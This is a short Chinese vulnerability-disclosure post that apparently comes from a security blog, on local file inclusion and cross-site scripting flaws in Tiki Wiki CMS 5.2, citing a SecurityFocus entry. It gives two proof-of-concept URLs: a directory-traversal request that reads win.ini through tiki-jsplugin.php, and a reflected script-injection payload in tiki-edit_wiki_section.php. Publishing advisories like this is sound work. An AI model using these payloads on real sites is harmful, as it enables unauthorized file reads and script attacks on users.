【漏洞】ki Wiki CMS本地文件包含及跨站脚本

  • A+
所属分类:lcx

漏洞标题:
    ki Wiki CMS 本地文件包含和跨站脚本漏洞
    ki Wiki CMS 本地文件包含以及跨站脚本漏洞

漏洞描述:
    攻击者可以通过浏览器利用这些问题。利用一个跨站点脚本问题,攻击者必须诱使不知情的用户点击一个恶意的URI。

已发布到官网:
    http://www.securityfocus.com/bid/43507

secureshell-h [email protected] 回信:

【漏洞】ki Wiki CMS本地文件包含及跨站脚本

本地文件漏洞EXP:
    http://127.0.0.1/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini

跨站脚本漏洞演示:
    http://127.0.0.1/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

文章来源于lcx.cc:【漏洞】ki Wiki CMS本地文件包含及跨站脚本

相关推荐: 看看IT强人如何求婚!

文章来源于lcx.cc:看看IT强人如何求婚!相关推荐: 今天遇到一个微信公众平台注入的实例之前有过讨论(大家有考虑过微信公众平台的注入么),但是情况是我自己模拟出来的,今天终于遇到一个实例。 话不多说,上图。 附送盲打到的后台 [原文地址] 相关讨论: 1#…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: